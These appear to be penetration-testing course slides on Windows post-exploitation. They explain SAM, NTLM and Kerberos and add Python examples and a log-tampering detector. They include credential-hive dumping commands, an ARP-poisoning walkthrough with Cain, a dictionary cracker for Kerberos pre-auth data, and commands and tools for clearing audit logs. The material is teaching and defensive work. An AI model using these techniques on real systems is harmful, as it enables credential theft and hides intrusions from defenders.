Phases 4-6

PENETRATION TESTING

Phases 4-5

Post Exploitation
Methodology
Post-Exploitation

Once we have established an initial foothold in the targeted environment, the goal of
most penetration testers (as well as real attackers) is to extract as much data as possible
from the victim, to expand their access, and to secure persistent access to the
network. Examples of pillaging actions that can be performed are:
• Privilege escalation
• Lateral movement
• Password dumping/cracking
• Data exfiltration
• Setting up backdoors
This is definitely not a final list of what you can do once you compromise a target, but
it does represent some of the most important activities.
Post-Exploitation

From the attacker's perspective, one of the most valuable assets you can
pillage from the victim, especially in an enterprise environment, is
passwords (or their hashes).
Obtaining passwords not only lets an attacker access the resources
available to the affected accounts but also enables attack techniques
that support the other goals mentioned above.
With a proper set of credentials very few actions are out of reach: they can be
used for credential-based attacks (pass-the-hash, pass-the-ticket), privilege
escalation and lateral movement, as well as most of the other post-exploitation
steps. The caveat is that every use of a stolen credential produces authentication
events on the target, so credentials should be used deliberately rather than
sprayed across the network.
Password Cracking

• Before any password-cracking attack begins we need to understand which
hash or credential type we are dealing with and whether cracking it is feasible
at all (format, salting, algorithm cost, password policy).
• As you saw during phase 1, we collected a large amount of user data
including email addresses and usernames.
• This allows a pentester to narrow the attack down and target one (or
more) specific account(s) with password-cracking tools, which makes the attack
faster and more likely to succeed.
• Normally the best accounts to collect during the reconnaissance phase, and of
course to attack with password attacks, are those with higher
privileges such as admin accounts. However, you should also assess the target's
monitoring: privileged accounts are often watched closely (logon alerts, lockout
thresholds). In that situation it is better to start with a regular user account and
then propagate the attack further from there.
Password Cracking

Authentication mechanisms used by Microsoft


In order to understand password cracking and password-attack methodology in
general, we should explain how Windows performs authentication.
The main mechanisms are the SAM, the LM and NT password hashes, the NTLM protocol, and Kerberos.
The Security Accounts Manager (SAM) is the database in which Windows stores local
security principals (accounts, or any entity that can be authenticated).
Credentials and other account information are kept in this database, with
passwords stored as hashes rather than in clear text. Domain accounts are stored in
the same form in Active Directory's NTDS.dit on the domain controllers, not in the SAM.
On a running system Windows keeps the SAM hive file open with an exclusive lock, so
it cannot simply be copied by other processes. In practice attackers do not wait for
the machine to be powered off: with administrative rights the hashes can be read
through the registry (for example by saving the HKLM\SAM and HKLM\SYSTEM hives with
reg save, or with tools such as Mimikatz or Impacket's secretsdump), copied from a
Volume Shadow Copy, or extracted from LSASS memory. An offline copy of the disk, or
a crashed system, is only needed when no such privilege is available.
Password Cracking

Passwords in SAM
• On all NT-based Windows versions, local account passwords are stored in the SAM as LM and/or NT hashes.
The hive file is C:\Windows\System32\config\SAM.
• Dumped in the common pwdump format, an account looks like this:
• User:1010:624AAC413795CDC14E835F1CD90F4C76:6F585FF8FF6280B59CCE252FDB500EB8:::
• The colon-separated fields are the username, the RID, the LM hash and the NT hash (the trailing fields are
unused). Tools such as pwdump and fgdump extract the hashes; Ophcrack, L0phtCrack, John the Ripper and
hashcat crack them.
• Windows Vista and later do not store the LM hash by default (the NoLMHash policy; it can be re-enabled but
should not be). The LM field then holds the fixed placeholder aad3b435b51404eeaad3b435b51404ee, which is
the LM hash of an empty password and has nothing to do with the real password. DO NOT CRACK THIS! The
same placeholder appears whenever the password is longer than 14 characters, because LM cannot hash more
than 14.
• Neither the LM nor the NT hash is salted. The NT hash is simply MD4 over the UTF-16LE encoding of the
password, so two accounts with the same password have identical hashes, precomputed (rainbow) tables work,
and the hash can be used directly in pass-the-hash attacks.
• What the SAM does do is encrypt the stored hashes with a key derived from the SYSTEM hive (the boot key),
which is why a SAM dump needs the SYSTEM hive as well. This is encryption, not salting, and it adds nothing
once both hives are in hand.
• Salted formats do exist elsewhere on Windows: cached domain logons (MSCache2/DCC2) are salted with the
username and iterated, and Kerberos AES keys are derived with PBKDF2 from a salt containing the realm and
principal name. Those are far slower to attack offline than NT hashes, and precomputed tables do not apply.
Password Cracking
NTLM Authentication
NT LAN Manager (NTLM) is Microsoft's proprietary challenge-response protocol; outside Windows it appears only in
reimplementations such as Samba. NTLMv1 and v2 are still widely used in environments and applications where
Kerberos is not available (access by IP address, non-domain hosts, many proxies and third-party products).
NTLMv1 is obsolete but still supported in most products. Where Kerberos is not possible it should be replaced by
NTLMv2 (the LmCompatibilityLevel policy controls this): its response is three DES encryptions of the challenge keyed
with pieces of the NT hash, so an attacker who captures one challenge/response pair can recover the NT hash itself.
NTLMv2 uses HMAC-MD5 responses with a client nonce, which fixes that, but it is still weak compared with Kerberos: a
captured response can be brute-forced offline, and the exchange can be relayed to another server unless signing or
channel binding is enforced. In Windows, NTLM is implemented by the NTLM Security Support Provider (NTLMSSP); SSPI
is the interface through which applications negotiate NTLM or Kerberos, not an additional protection layer on top
of NTLM.
If NTLM is used the following steps will be made during authentication:
1. The user enters a username and password at the logon prompt or dialog.
2. Windows hashes the password (MD4 over its UTF-16LE encoding gives the NT hash). The hash is held in LSASS
memory and is never sent over the network.
3. The client sends a NEGOTIATE message to the server.
4. The server replies with a CHALLENGE message containing an 8-byte random nonce (the server challenge).
5. The client computes a response over the challenge keyed with the NT hash (three DES encryptions of the challenge
in NTLMv1; HMAC-MD5 over the challenge, a client nonce and a timestamp in NTLMv2) and sends it, together with the
username and domain, in the AUTHENTICATE message.
6. The server (or, for domain accounts, the domain controller via the Netlogon secure channel) computes the same
response from the hash stored in the SAM or NTDS.dit and compares it.
If the responses match, the logon request is accepted. If not, the request is denied.
Because the verifier only needs the hash to check the response, anyone who obtains the hash can authenticate without
knowing the password. This is the basis of pass-the-hash.
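The exchange above, worked through in code. This is an added example written for this page, not code from the slides or from Microsoft; it implements the NTLMv2 response computation from MS-NLMP (NTOWFv2 and NTProofStr) with both the client and the verifier side, using only the standard library. The user name, domain, challenges, timestamp and target info are constructed values; the NT hash used is the real NT hash of the password "password", and the point of the demo is that it appears on neither side of the wire. The AUTHENTICATE message's other fields (LM response, flags, MIC) are omitted.

```python
"""NTLMv2 challenge/response, both sides (MS-NLMP 3.3.2).

Added example: shows that only an HMAC keyed with the NT hash crosses the
wire, and that the verifier needs nothing but the stored hash."""
import hashlib
import hmac
import struct

# NT hash of the password "password" (MD4 over UTF-16LE). Assumed shared secret:
# the client derives it from the typed password, the server has it stored.
NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 response key: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def build_temp(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """The 'temp' blob the client authenticates: version bytes, FILETIME timestamp,
    8-byte client nonce, and the server's target info (AV pairs)."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def client_response(nt_hash: bytes, user: str, domain: str, server_challenge: bytes,
                    timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """Client side after CHALLENGE: NtChallengeResponse = NTProofStr || temp."""
    key = ntowf_v2(nt_hash, user, domain)
    temp = build_temp(timestamp, client_challenge, target_info)
    nt_proof = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    return nt_proof + temp


def server_verify(stored_nt_hash: bytes, user: str, domain: str, server_challenge: bytes,
                  nt_challenge_response: bytes) -> bool:
    """Verifier side: recompute NTProofStr from the stored hash and compare."""
    nt_proof, temp = nt_challenge_response[:16], nt_challenge_response[16:]
    key = ntowf_v2(stored_nt_hash, user, domain)
    expected = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(nt_proof, expected)


def demo() -> dict:
    """Run one exchange plus two failure cases; all inputs are constructed."""
    user, domain = "alice", "CORP"
    server_challenge = bytes.fromhex("0123456789abcdef")   # 8-byte nonce from the CHALLENGE message
    client_challenge = bytes.fromhex("aaaaaaaaaaaaaaaa")   # client nonce (random in real clients)
    timestamp = 0x01D5A0B0C0D0E0F0                          # constructed FILETIME value
    # Minimal target info: one NetBIOS-domain AV pair (id 2) followed by the end marker.
    target_info = struct.pack("<HH", 2, 8) + "CORP".encode("utf-16-le") + struct.pack("<HH", 0, 0)

    response = client_response(NT_HASH, user, domain, server_challenge,
                               timestamp, client_challenge, target_info)
    empty_pw_hash = bytes.fromhex("31d6cfe0d16ae931b73c59d7e0c089c0")  # NT hash of ""
    return {
        "accepted": server_verify(NT_HASH, user, domain, server_challenge, response),
        "wrong_hash_rejected": not server_verify(empty_pw_hash, user, domain, server_challenge, response),
        # Same response replayed against a fresh server challenge must fail.
        "replay_rejected": not server_verify(NT_HASH, user, domain, bytes.fromhex("fedcba9876543210"), response),
        "hash_on_wire": NT_HASH in response,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The replay check is what distinguishes a relay from a replay: a captured response is useless against a later challenge, but an attacker sitting between client and server can forward the live challenge and response and be authenticated as the client, which is why signing and channel binding matter.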
Password Cracking
Kerberos
Microsoft has used Kerberos (version 5) as the default domain authentication protocol since Windows 2000. It provides
a robust authentication framework built on symmetric-key cryptography and provides mutual authentication of client
and service. The Kerberos protocol uses the following components:
Key Distribution Center (KDC), which on Windows runs on every domain controller and contains:
Authentication Server (AS)
Ticket-Granting Server (TGS)
The process works as follows:
1. The user wants to access a service on another system (a file share, a web server, a database) and, if Kerberos is in
use in this environment, a service ticket is required.
2. The client first authenticates to the AS (AS-REQ). With pre-authentication, the client proves knowledge of the
password by sending the current timestamp encrypted with a key derived from it (the NT hash for the RC4 encryption
type, a salted PBKDF2-derived key for AES). The AS answers (AS-REP) with a ticket-granting ticket (TGT), encrypted
with the krbtgt account's key so the client can neither read nor alter it, plus a session key encrypted with the
user's key.
3. The client presents the TGT to the TGS (TGS-REQ) and names the service it wants; the TGS returns a service ticket
encrypted with that service's key (TGS-REP).
4. The client presents the service ticket to the service (AP-REQ), which decrypts it with its own key and accepts or
rejects the request. Tickets carry a lifetime (by default a TGT is valid for 10 hours and renewable for up to 7 days),
after which they must be renewed or re-obtained, which limits the window in which a stolen ticket can be used.
Note that the password never leaves the client. What crosses the wire is the encrypted pre-authentication timestamp
and the tickets, and both are attack targets: the timestamp can be cracked offline, and a TGT or service ticket
stolen from memory can be replayed (pass-the-ticket) for as long as it is valid.
Password Cracking
Cracking Kerberos Practical
In this practical we will crack passwords captured from Kerberos pre-authentication using Cain.
1. In Cain, start the sniffer by clicking the sniffer icon on the toolbar.
2. When prompted, choose the interface to sniff on.
3. Select the Sniffer tab. Click the blue + sign and click OK to scan for hosts.
4. Now enter the addresses of the host(s) to be ARP poisoned (typically a victim workstation and its domain
controller).
5. In the toolbar select the ARP poisoning icon and note that the status will change to "poisoning".
6. Wait for the victim to authenticate; after a couple of minutes click the Sniffer tab.
7. Click the Passwords tab.
8. Select MSKerb5-PreAuth Hashes, then right-click and select Send To Cracker.
9. Click the Cracker tab and select Kerb5 PreAuth Hashes.
10. Right-click a hash and select an attack (dictionary or brute force). This should now crack the hash.
Note that the longer you sniff the network the more credentials will be captured, so plan your attack with
some extra time.
What Cain captures here is the PA-ENC-TIMESTAMP from the AS-REQ: a timestamp encrypted with the user's
long-term key, which for the RC4 encryption type (etype 23) is the NT hash itself. Cain's cracker targets that RC4
variant; the same capture can also be cracked with hashcat (mode 7500) or John the Ripper. Two caveats: ARP
poisoning is noisy, can disrupt the victims' traffic and is readily detected by network monitoring, and modern
domains default to the AES encryption types, whose keys are salted and PBKDF2-derived and therefore far slower to
crack.
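The two pieces above, the unsalted NT hash of the "Passwords in SAM" slide and the pre-authentication crack of this practical, fit together in one worked example. This is an added example written for this page, not code from the slides, from Cain or from any Kerberos library: it implements MD4 (RFC 1320) because hashlib does not expose it everywhere, derives the NT hash the SAM stores, implements RC4-HMAC encryption as specified in RFC 4757, and runs a dictionary attack against a constructed AS-REQ pre-auth field. The victim password, word list, timestamp and confounder are constructed; the key usage value 1 is the real PA-ENC-TIMESTAMP usage number.

```python
"""NT hash (unsalted MD4 over UTF-16LE) and RC4-HMAC (etype 23) Kerberos
pre-authentication, with an offline dictionary attack on a captured
PA-ENC-TIMESTAMP. Added example; standard library only."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (needed because OpenSSL-backed hashlib may lack it)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), range(16), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, order, shifts, const in rounds:
            for i, k in enumerate(order):
                a = _lrot((a + f(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate roles: next step updates the old d
        h = [(u + v) & MASK for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """The NT hash as stored in the SAM/NTDS: no salt, so equal passwords give equal hashes."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 encrypt: returns checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(key: bytes, usage: int, edata: bytes):
    """Returns the plaintext if the checksum verifies under `key`, else None."""
    checksum, ciphertext = edata[:16], edata[16:]
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = rc4(k3, ciphertext)
    if not hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum):
        return None
    return data[8:]   # strip the 8-byte confounder


PA_ENC_TIMESTAMP_USAGE = 1   # key usage number for AS-REQ PA-ENC-TIMESTAMP


def crack_preauth(edata: bytes, wordlist):
    """Offline attack: the candidate whose NT hash verifies the checksum is the password."""
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), PA_ENC_TIMESTAMP_USAGE, edata) is not None:
            return candidate
    return None


# Constructed capture: what the AS-REQ pre-auth field would hold for a user whose
# password is "password". The plaintext is a DER-encoded PA-ENC-TS-ENC with
# patimestamp 20240102030405Z; a real client uses a random confounder, fixed here.
VICTIM_PASSWORD = "password"
PA_ENC_TS_ENC = b"\x30\x13\xa0\x11\x18\x0f" + b"20240102030405Z"
CAPTURED_EDATA = rc4_hmac_encrypt(nt_hash(VICTIM_PASSWORD), PA_ENC_TIMESTAMP_USAGE,
                                  PA_ENC_TS_ENC, bytes(range(8)))

if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("recovered:", crack_preauth(CAPTURED_EDATA, ["123456", "Welcome1", "password"]))
```

Each candidate costs one MD4 and three HMAC-MD5 calls plus a short RC4 pass, which is why RC4 pre-auth (and NT hashes in general) fall quickly to GPU crackers; the AES encryption types put 4096 PBKDF2 iterations and a per-principal salt in front of the same check.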
Covering Your Tracks
In most cases attackers try to prevent their activity from being discovered by the security team. To reach this goal they use various
techniques to hide their malware and the actions performed against the target. A common approach is deleting error messages, log files and
other items that were created or altered during the attack.
Disabling Auditing
One of the best ways to avoid discovery is to leave no tracks at all, and the best way to do that is to prevent tracks from
being created, or at least to minimise the amount of evidence. When you are trying not to leave tracks, a good starting point is altering the way events
are logged on the targeted system. Disabling auditing prevents certain events from being recorded and therefore slows detection efforts.
In the Windows environment auditing is controlled with the auditpol command. The syntax below is that of the legacy Resource Kit
auditpol, which could be run against a remote machine over the NULL/administrative session established during enumeration:
auditpol \\<ip address of target> /clear
On current Windows versions auditpol.exe operates on the local machine only (auditpol /clear /y wipes the policy, auditpol /get
/category:* displays it), so it is run on the compromised host itself or through a remote shell.
You can also perform what amounts to the surgical removal of entries from the Windows Security log, using tools such as the following:
• Dump Event Log
• ELSave
• WinZapper
• CCleaner
• Wipe
• MRU-Blaster
• Tracks Eraser Pro
• Clear My History
A caveat for the tester: these actions are themselves evidence. Changing the audit policy records event 4719 (System audit policy was
changed), and clearing the Security log records event 1102 (The audit log was cleared; 104 in the System log for other logs) as the first
entry of the fresh log. A host that forwards events to a collector or SIEM has already shipped what you are trying to remove, and a sudden
silence from a normally busy host is itself a signal. Several of the tools listed were written for the .evt logs of Windows 2000/XP and do
not handle the EVTX format used since Vista. On a legitimate engagement, any log tampering must be agreed with the client in advance and
recorded in the report.
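From the defender's side, the indicators described above are easy to turn into detection logic. This is an added example, not code from the slides or from any product: it runs three checks over a constructed list of Windows event records in the shape you would get from exporting events as JSON (Computer, Channel, EventID, TimeCreated). The event IDs 4719, 1102 and 104 are the real Windows IDs; the host names, times and logon events are constructed sample data, and the 15-minute and 60-minute windows are assumptions to tune per environment.

```python
"""Detect log-tampering indicators in Windows event records.

Added example: flags audit-policy changes and log clears, correlates the two,
and spots hosts that go silent. Input is a constructed event list."""
from datetime import datetime, timedelta

# Indicators of tampering: (EventID, Channel) -> Windows event description.
TAMPER = {
    (4719, "Security"): "System audit policy was changed",
    (1102, "Security"): "The audit log was cleared",
    (104, "System"): "An event log was cleared",
}

# Constructed sample: WS01 has its audit policy changed, its Security log
# wiped, then logs nothing for over an hour; DC01 logs steadily.
EVENTS = [
    {"Computer": "WS01", "Channel": "Security", "EventID": 4624, "TimeCreated": "2024-03-01T09:55:00"},
    {"Computer": "WS01", "Channel": "Security", "EventID": 4719, "TimeCreated": "2024-03-01T10:00:00"},
    {"Computer": "WS01", "Channel": "Security", "EventID": 4624, "TimeCreated": "2024-03-01T10:01:00"},
    {"Computer": "WS01", "Channel": "Security", "EventID": 1102, "TimeCreated": "2024-03-01T10:05:00"},
    {"Computer": "WS01", "Channel": "Security", "EventID": 4624, "TimeCreated": "2024-03-01T11:40:00"},
    {"Computer": "DC01", "Channel": "Security", "EventID": 4624, "TimeCreated": "2024-03-01T10:00:00"},
    {"Computer": "DC01", "Channel": "Security", "EventID": 4624, "TimeCreated": "2024-03-01T10:20:00"},
    {"Computer": "DC01", "Channel": "Security", "EventID": 4624, "TimeCreated": "2024-03-01T10:40:00"},
]


def _ts(event: dict) -> datetime:
    return datetime.fromisoformat(event["TimeCreated"])


def _by_host(events):
    """Group events per host, ordered by time."""
    grouped = {}
    for event in sorted(events, key=_ts):
        grouped.setdefault(event["Computer"], []).append(event)
    return grouped


def tamper_events(events):
    """Every event that is itself a tampering indicator: (host, id, description)."""
    return [(e["Computer"], e["EventID"], TAMPER[(e["EventID"], e["Channel"])])
            for e in events if (e["EventID"], e["Channel"]) in TAMPER]


def policy_change_then_clear(events, window=timedelta(minutes=15)):
    """Hosts where a 4719 is followed by a 1102 within `window`: auditing was
    reconfigured and the evidence wiped. Returns (host, time of the clear)."""
    hits = []
    for host, evs in _by_host(events).items():
        changes = [_ts(e) for e in evs if (e["EventID"], e["Channel"]) == (4719, "Security")]
        for e in evs:
            if (e["EventID"], e["Channel"]) == (1102, "Security"):
                if any(timedelta(0) <= _ts(e) - t <= window for t in changes):
                    hits.append((host, e["TimeCreated"]))
    return hits


def silent_gaps(events, max_gap=timedelta(minutes=60)):
    """Per host, gaps longer than `max_gap` between consecutive events.
    A host that normally logs steadily and goes quiet right after a 4719 is
    the signature of auditing being switched off."""
    gaps = []
    for host, evs in _by_host(events).items():
        times = [_ts(e) for e in evs]
        for prev, cur in zip(times, times[1:]):
            if cur - prev > max_gap:
                gaps.append((host, prev.isoformat(), cur.isoformat()))
    return gaps


if __name__ == "__main__":
    print("tamper events:", tamper_events(EVENTS))
    print("policy change then clear:", policy_change_then_clear(EVENTS))
    print("silent gaps:", silent_gaps(EVENTS))
```

The gap check only works against a baseline: on a host that logs a handful of events a day it produces noise, so in practice the threshold is derived from that host's own event rate rather than a fixed value.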
QUESTIONS???